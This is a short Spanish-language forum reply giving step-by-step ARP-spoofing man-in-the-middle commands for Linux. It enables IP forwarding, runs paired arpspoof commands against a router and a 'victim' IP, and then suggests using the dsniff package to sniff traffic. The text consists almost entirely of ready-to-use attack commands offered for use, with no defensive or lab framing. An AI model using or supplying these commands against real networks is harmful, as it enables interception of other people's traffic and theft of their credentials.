Te has mirado la teoría del MitM en IPv4 de macspoof? si no lo has hecho hazlo, luego.
Un MitM clásica en linux sería algo así en mi caso
echo 1 > /proc/sys/net/ipv4/ip_forward
^Importante
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.122
en otra consola
arpspoof -i wlan0 -t 192.168.1.122 192.168.1.1
generalizando sería
arpspoof -i interface -t ip_de_tu_router ip_victima y en otra consola
arpspoof -i interface -t ip_victima ip_de_tu_router Luego de hacer esto con el paquete dsniff juegas un rato